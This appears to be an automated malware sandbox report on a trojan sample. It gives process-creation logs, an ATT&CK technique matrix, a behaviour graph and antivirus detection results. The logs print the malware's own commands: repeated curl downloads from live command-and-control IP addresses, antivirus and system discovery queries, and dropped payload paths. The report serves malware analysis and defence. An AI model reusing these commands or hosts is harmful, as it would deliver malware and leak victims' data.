Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zipJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayNameJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029B9000.00000004.00000020.00020000.00000000.sdmp, Ur.pif, 0000000A.00000000.1743125361.00000000006C6000.00000002.00000001.01000000.00000006.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_0041713F
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,50_2_00416AF5
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,50_2_0041BC50
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: EnumSystemLocalesA,50_2_00417068
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: EnumSystemLocalesA,50_2_00416CCA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_00411CF0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_0041709F
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_00411CB0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,50_2_00416D51
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoW,WideCharToMultiByte,50_2_0041BD13
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_004171C4
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_0041725C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: EnumSystemLocalesA,50_2_00416F55
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,50_2_0041BB3D
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,MultiByteToWideChar,50_2_0041BBFA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_00416FAB
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00413F9E GetLocalTime,GetSystemTime,GetTimeZoneInformation,50_2_00413F9E
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004194BD GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,50_2_004194BD
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts241
Windows Management Instrumentation		1
Scripting		1
Access Token Manipulation		111
Masquerading		11
Input Capture		2
System Time Discovery		Remote Services11
Input Capture		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API		1
DLL Side-Loading		12
Process Injection		13
Virtualization/Sandbox Evasion		LSASS Memory241
Security Software Discovery		Remote Desktop Protocol1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		1
Access Token Manipulation		Security Account Manager13
Virtualization/Sandbox Evasion		SMB/Windows Admin Shares1
Clipboard Data		3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Process Injection		NTDS3
Process Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets3
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
Obfuscated Files or Information		Cached Domain Credentials46
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560430 Sample: vqMMwqCFZQ Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 116 mCpLognXwrhUlFWj.mCpLognXwrhUlFWj 2->116 118 GyxNFpxuLvDE.GyxNFpxuLvDE 2->118 132 Suricata IDS alerts for network traffic 2->132 134 Antivirus detection for URL or domain 2->134 136 Multi AV Scanner detection for submitted file 2->136 138 4 other signatures 2->138 11 vqMMwqCFZQ.exe 21 2->11         started        signatures3 process4 file5 98 C:\Users\user\AppData\Local\Temp\Perhaps, data 11->98 dropped 100 C:\Users\user\AppData\Local\Temp\Leaving, data 11->100 dropped 102 C:\Users\user\AppData\Local\Temp\Label, data 11->102 dropped 104 4 other malicious files 11->104 dropped 142 Writes many files with high entropy 11->142 15 cmd.exe 3 11->15         started        signatures6 process7 file8 114 C:\Users\user\AppData\Local\Temp\...\Ur.pif, PE32 15->114 dropped 124 Drops PE files with a suspicious file extension 15->124 126 Writes many files with high entropy 15->126 19 Ur.pif 19 15->19         started        23 cmd.exe 2 15->23         started        25 choice.exe 1 15->25         started        27 7 other processes 15->27 signatures9 process10 file11 80 C:\Users\user\AppData\...\RevenueDevices.exe, PE32 19->80 dropped 82 C:\Users\user\AppData\Roaming\...\xhwq.zip, Zip 19->82 dropped 84 C:\Users\user\AppData\Roaming\...\azvw.exe, PE32 19->84 dropped 140 Writes many files with high entropy 19->140 29 RevenueDevices.exe 19->29         started        33 cmd.exe 19->33         started        35 cmd.exe 19->35         started        39 24 other processes 19->39 86 C:\Users\user\AppData\Local\Temp\139918\v, data 23->86 dropped 37 Conhost.exe 25->37         started        signatures12 process13 file14 106 C:\Users\user\AppData\Local\Temp\Showcase, data 29->106 dropped 108 C:\Users\user\AppData\Local\Temp\Shepherd, data 29->108 dropped 110 C:\Users\user\AppData\Local\Temp\Samples, data 29->110 dropped 112 5 other malicious files 29->112 dropped 144 Multi AV Scanner detection for dropped file 29->144 146 Writes many files with high entropy 29->146 41 cmd.exe 29->41         started        44 azvw.exe 33->44         started        46 conhost.exe 33->46         started        48 systeminfo.exe 35->48         started        58 3 other processes 35->58 51 curl.exe 39->51         started        54 conhost.exe 39->54         started        56 conhost.exe 39->56         started        60 47 other processes 39->60 signatures15 process16 dnsIp17 88 C:\Users\user\AppData\Local\...ither.pif, PE32 41->88 dropped 62 conhost.exe 41->62         started        64 tasklist.exe 41->64         started        90 C:\Users\user\AppData\...\PsInfo64.exe, PE32+ 44->90 dropped 92 C:\Users\user\AppData\Roaming\...\PsInfo.exe, PE32 44->92 dropped 94 C:\Users\user\AppData\Roaming\...\7zxa.dll, PE32 44->94 dropped 96 4 other files (2 malicious) 44->96 dropped 66 Conhost.exe 44->66         started        128 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 48->128 130 Writes or reads registry keys via WMI 48->130 68 WmiPrvSE.exe 48->68         started        70 Conhost.exe 48->70         started        120 178.215.224.74, 49804, 49807, 49813 LVLT-10753US Germany 51->120 72 Conhost.exe 54->72         started        74 Conhost.exe 56->74         started        122 178.215.224.252, 49743, 50048, 80 LVLT-10753US Germany 60->122 76 Conhost.exe 60->76         started        78 6 other processes 60->78 file18 signatures19 process20

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
vqMMwqCFZQ.exe67%ReversingLabsWin32.Trojan.Generic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\139918\Ur.pif5%ReversingLabs
C:\Users\user\AppData\Local\Temp\303482\Either.pif5%ReversingLabs
C:\Users\user\AppData\Local\Temp\RevenueDevices.exe58%ReversingLabsWin32.Trojan.Ramses
C:\Users\user\AppData\Roaming\DolphinDumps\7za.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\7za.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe5%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\zip.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://178.215.224.74/v10/ukyh.php?jspo=6ecur32.dll100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=9A5605DE11447A0E2031624EE8FBDE100%Avira URL Cloudmalware
